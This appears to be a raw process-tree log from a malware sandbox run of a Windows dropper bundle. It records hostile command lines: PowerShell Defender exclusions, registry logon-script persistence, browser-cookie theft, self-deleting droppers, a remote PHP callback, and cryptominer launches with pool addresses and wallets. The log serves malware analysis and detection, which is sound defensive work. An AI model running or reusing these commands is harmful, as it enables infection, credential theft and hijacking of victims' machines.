C:\Users\Admin\AppData\Local\Temp\K3CXTA31SO\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\K3CXTA31SO\multitimer.exe" 2 3.1617432751.606810af89b5820⤵PID:8944
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\21E939HAZB\setups.exe"C:\Users\Admin\AppData\Local\Temp\21E939HAZB\setups.exe" ll18⤵PID:8024
-
C:\Users\Admin\AppData\Local\Temp\is-854QO.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-854QO.tmp\setups.tmp" /SL5="$805CC,635399,250368,C:\Users\Admin\AppData\Local\Temp\21E939HAZB\setups.exe" ll19⤵PID:3148
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"17⤵PID:5744
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe18⤵PID:4324
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe19⤵
- Kills process with taskkill
PID:352
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Full Program Features.exe"17⤵PID:4416
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\akyy05oq.vud\Four.exe & exit15⤵PID:8632
-
C:\Users\Admin\AppData\Local\Temp\akyy05oq.vud\Four.exeC:\Users\Admin\AppData\Local\Temp\akyy05oq.vud\Four.exe16⤵PID:9116
-
C:\Users\Admin\AppData\Local\Temp\3KQYJUJFXU\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\3KQYJUJFXU\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10417⤵PID:5372
-
C:\Users\Admin\AppData\Local\Temp\3KQYJUJFXU\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\3KQYJUJFXU\multitimer.exe" 1 3.1617432745.606810a925aef 10418⤵PID:3120
-
C:\Users\Admin\AppData\Local\Temp\3KQYJUJFXU\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\3KQYJUJFXU\multitimer.exe" 2 3.1617432745.606810a925aef19⤵PID:5300
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\TLLGXL6ZAZ\setups.exe"C:\Users\Admin\AppData\Local\Temp\TLLGXL6ZAZ\setups.exe" ll17⤵PID:4672
-
C:\Users\Admin\AppData\Local\Temp\is-RD66Q.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-RD66Q.tmp\setups.tmp" /SL5="$4050E,635399,250368,C:\Users\Admin\AppData\Local\Temp\TLLGXL6ZAZ\setups.exe" ll18⤵PID:4624
-
-
-
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"11⤵PID:5480
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"12⤵PID:7064
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install13⤵PID:6980
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"11⤵PID:5664
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"12⤵PID:7052
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install13⤵PID:6440
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"11⤵PID:5172
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"11⤵PID:2576
-
C:\Users\Admin\AppData\Local\Temp\ERA01JQDSD\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ERA01JQDSD\multitimer.exe" 0 306065bb10421b26.04333812 0 10312⤵PID:7008
-
C:\Users\Admin\AppData\Local\Temp\ERA01JQDSD\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ERA01JQDSD\multitimer.exe" 1 3.1617432532.60680fd42cccf 10313⤵PID:4216
-
C:\Users\Admin\AppData\Local\Temp\ERA01JQDSD\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ERA01JQDSD\multitimer.exe" 2 3.1617432532.60680fd42cccf14⤵PID:3176
-
C:\Users\Admin\AppData\Local\Temp\gx4y34dmyyh\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\gx4y34dmyyh\cpyrix.exe" /VERYSILENT15⤵PID:7456
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe16⤵PID:7804
-
C:\Users\Admin\AppData\Local\Temp\ab71a245-707d-41fd-ab95-ddc3ef9ea6f8\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\ab71a245-707d-41fd-ab95-ddc3ef9ea6f8\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\ab71a245-707d-41fd-ab95-ddc3ef9ea6f8\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run17⤵PID:5924
-
C:\Users\Admin\AppData\Local\Temp\ab71a245-707d-41fd-ab95-ddc3ef9ea6f8\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\ab71a245-707d-41fd-ab95-ddc3ef9ea6f8\AdvancedRun.exe" /SpecialRun 4101d8 592418⤵PID:8040
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force17⤵PID:3232
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 117⤵PID:8096
-
C:\Windows\SysWOW64\timeout.exetimeout 118⤵
- Delays execution with timeout.exe
PID:4204
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"17⤵PID:96
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7804 -s 163617⤵
- Program crash
PID:4652
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe16⤵PID:208
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"17⤵PID:8072
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\r3ax0t2bhcm\dclybmqiqlg.exe"C:\Users\Admin\AppData\Local\Temp\r3ax0t2bhcm\dclybmqiqlg.exe" /ustwo INSTALL15⤵PID:7476
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "dclybmqiqlg.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\r3ax0t2bhcm\dclybmqiqlg.exe" & exit16⤵PID:3920
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "dclybmqiqlg.exe" /f17⤵
- Kills process with taskkill
PID:4272
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5hijnnghslh\vpn.exe"C:\Users\Admin\AppData\Local\Temp\5hijnnghslh\vpn.exe" /silent /subid=48215⤵PID:7548
-
C:\Users\Admin\AppData\Local\Temp\is-3BRC4.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-3BRC4.tmp\vpn.tmp" /SL5="$30104,15170975,270336,C:\Users\Admin\AppData\Local\Temp\5hijnnghslh\vpn.exe" /silent /subid=48216⤵PID:7736
-
-
-
C:\Users\Admin\AppData\Local\Temp\pnzzlnfnjle\app.exe"C:\Users\Admin\AppData\Local\Temp\pnzzlnfnjle\app.exe" /8-2315⤵PID:7540
-
C:\Users\Admin\AppData\Local\Temp\pnzzlnfnjle\app.exe"C:\Users\Admin\AppData\Local\Temp\pnzzlnfnjle\app.exe" /8-2316⤵PID:9092
-
-
-
C:\Users\Admin\AppData\Local\Temp\kfcnmxbgq5b\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\kfcnmxbgq5b\Setup3310.exe" /Verysilent /subid=57715⤵PID:7532
-
C:\Users\Admin\AppData\Local\Temp\is-KIA0A.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-KIA0A.tmp\Setup3310.tmp" /SL5="$20106,138429,56832,C:\Users\Admin\AppData\Local\Temp\kfcnmxbgq5b\Setup3310.exe" /Verysilent /subid=57716⤵PID:7696
-
C:\Users\Admin\AppData\Local\Temp\is-UVJR4.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-UVJR4.tmp\Setup.exe" /Verysilent17⤵PID:6676
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\M9UQLAQ358\setups.exe"C:\Users\Admin\AppData\Local\Temp\M9UQLAQ358\setups.exe" ll12⤵PID:6776
-
C:\Users\Admin\AppData\Local\Temp\is-0GKTJ.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-0GKTJ.tmp\setups.tmp" /SL5="$4039E,635399,250368,C:\Users\Admin\AppData\Local\Temp\M9UQLAQ358\setups.exe" ll13⤵PID:6172
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe"11⤵PID:792
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:6036
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:5072
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"11⤵PID:2904
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"12⤵PID:8084
-
C:\Users\Admin\Videos\lilal.exe"C:\Users\Admin\Videos\lilal.exe"13⤵PID:7240
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"14⤵PID:5776
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Dir.mui14⤵PID:2724
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe15⤵PID:7376
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" 8084 C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"13⤵PID:3796
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 808414⤵
- Kills process with taskkill
PID:676
-
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 314⤵PID:3576
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\lt32qxptci2\vict.exe"C:\Users\Admin\AppData\Local\Temp\lt32qxptci2\vict.exe" /VERYSILENT /id=5358⤵PID:4968
-
C:\Users\Admin\AppData\Local\Temp\is-8NVOL.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-8NVOL.tmp\vict.tmp" /SL5="$1038A,870426,780800,C:\Users\Admin\AppData\Local\Temp\lt32qxptci2\vict.exe" /VERYSILENT /id=5359⤵PID:5376
-
C:\Users\Admin\AppData\Local\Temp\is-JOBJJ.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-JOBJJ.tmp\win1host.exe" 53510⤵PID:5916
-
C:\Users\Admin\AppData\Local\Temp\nyFJnPk1Z.exe"C:\Users\Admin\AppData\Local\Temp\nyFJnPk1Z.exe"11⤵PID:5128
-
C:\Users\Admin\AppData\Local\Temp\nyFJnPk1Z.exe"C:\Users\Admin\AppData\Local\Temp\nyFJnPk1Z.exe"12⤵PID:5932
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5916 -s 146011⤵
- Program crash
PID:7048
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3n0ki3bl3z1\l3vbrgh33uv.exe"C:\Users\Admin\AppData\Local\Temp\3n0ki3bl3z1\l3vbrgh33uv.exe"8⤵PID:5100
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\3n0ki3bl3z1\l3vbrgh33uv.exe"9⤵PID:5320
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:5716
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fb5saacjo5v\vljzflv4evy.exe"C:\Users\Admin\AppData\Local\Temp\fb5saacjo5v\vljzflv4evy.exe" /ustwo INSTALL8⤵PID:5080
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "vljzflv4evy.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\fb5saacjo5v\vljzflv4evy.exe" & exit9⤵PID:6764
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "vljzflv4evy.exe" /f10⤵
- Kills process with taskkill
PID:6996
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\51lecdmccwo\vpn.exe"C:\Users\Admin\AppData\Local\Temp\51lecdmccwo\vpn.exe" /silent /subid=4828⤵PID:5228
-
C:\Users\Admin\AppData\Local\Temp\is-G0D9U.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-G0D9U.tmp\vpn.tmp" /SL5="$103B8,15170975,270336,C:\Users\Admin\AppData\Local\Temp\51lecdmccwo\vpn.exe" /silent /subid=4829⤵PID:5444
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:6088
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵PID:3908
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:4564
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵PID:4228
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵PID:7416
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵PID:5544
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\r24d3vavzm3\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\r24d3vavzm3\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:5220
-
-
C:\Users\Admin\AppData\Local\Temp\zzreqapihy4\app.exe"C:\Users\Admin\AppData\Local\Temp\zzreqapihy4\app.exe" /8-238⤵PID:5176
-
C:\Users\Admin\AppData\Local\Temp\zzreqapihy4\app.exe"C:\Users\Admin\AppData\Local\Temp\zzreqapihy4\app.exe" /8-239⤵PID:7840
-
-
-
C:\Users\Admin\AppData\Local\Temp\10h02ksuxlt\mnw3qg4p0nj.exe"C:\Users\Admin\AppData\Local\Temp\10h02ksuxlt\mnw3qg4p0nj.exe" /quiet SILENT=1 AF=7568⤵PID:5732
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\10h02ksuxlt\mnw3qg4p0nj.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\10h02ksuxlt\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617173336 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:6684
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1L6VYTR04F\setups.exe"C:\Users\Admin\AppData\Local\Temp\1L6VYTR04F\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Users\Admin\AppData\Local\Temp\is-BJ2LT.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-BJ2LT.tmp\setups.tmp" /SL5="$4011C,635399,250368,C:\Users\Admin\AppData\Local\Temp\1L6VYTR04F\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2280
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3180 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:5084
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:4016
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"4⤵PID:5568
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:5844
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:3300
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵PID:6000
-
C:\Users\Admin\AppData\Roaming\4E5F.tmp.exe"C:\Users\Admin\AppData\Roaming\4E5F.tmp.exe"5⤵PID:5992
-
C:\Users\Admin\AppData\Roaming\4E5F.tmp.exe"C:\Users\Admin\AppData\Roaming\4E5F.tmp.exe"6⤵PID:1540
-
-
-
C:\Users\Admin\AppData\Roaming\594D.tmp.exe"C:\Users\Admin\AppData\Roaming\594D.tmp.exe"5⤵PID:5020
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:6392
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:6552
-
-
-
C:\Users\Admin\AppData\Roaming\5D94.tmp.exe"C:\Users\Admin\AppData\Roaming\5D94.tmp.exe"5⤵PID:3824
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\5D94.tmp.exe6⤵PID:7156
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:3392
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"5⤵PID:6048
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:6888
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵PID:6940
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"4⤵PID:3952
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"4⤵PID:7340
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:7504
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:3164
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4044
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:2224
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4280
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4348
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5104
-
C:\Users\Admin\AppData\Local\Temp\is-KN4ND.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-KN4ND.tmp\IBInstaller_97039.tmp" /SL5="$103D2,14574851,721408,C:\Users\Admin\AppData\Local\Temp\r24d3vavzm3\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq1⤵PID:5460
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-F097J.tmp\{app}\microsoft.cab -F:* %ProgramData%2⤵PID:5896
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-F097J.tmp\{app}\microsoft.cab -F:* C:\ProgramData3⤵PID:3864
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f2⤵PID:6432
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039^¶m=2⤵PID:6452
-
-
C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"2⤵PID:6444
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:5360
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding AEFD9683C306FC305D99CC0043CD987C C2⤵PID:1744
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 6F9FA5F37DFA6ED9F1CCFA3DE6E9EBDC2⤵PID:4836
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵PID:8284
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default3⤵PID:8412
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:5632
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\57e31023ff1c47f78ed9e4696b362a87 /t 2724 /p 27561⤵PID:6192
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:6028
-
C:\Users\Admin\AppData\Local\Temp\EC.exeC:\Users\Admin\AppData\Local\Temp\EC.exe2⤵PID:5584
-
-
C:\Users\Admin\AppData\Local\Temp\132D.exeC:\Users\Admin\AppData\Local\Temp\132D.exe2⤵PID:7576
-
-
C:\Users\Admin\AppData\Local\Temp\74C7.exeC:\Users\Admin\AppData\Local\Temp\74C7.exe2⤵PID:3308
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe3⤵PID:7996
-
-
-
C:\Users\Admin\AppData\Local\Temp\89F6.exeC:\Users\Admin\AppData\Local\Temp\89F6.exe2⤵PID:7568
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:5440
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:8180
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:6124
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:3220
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:5016
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:4916
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:3380
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:5244
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:7188
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:7624
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{0438dc7a-5347-6e48-9251-6f34f1bae243}\oemvista.inf" "9" "4d14a44ff" "0000000000000180" "WinSta0\Default" "0000000000000184" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:7160
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000180"2⤵PID:3556
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:7444
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:5160
-
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca1⤵PID:5616
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵PID:7740
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:7224
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:8048
-
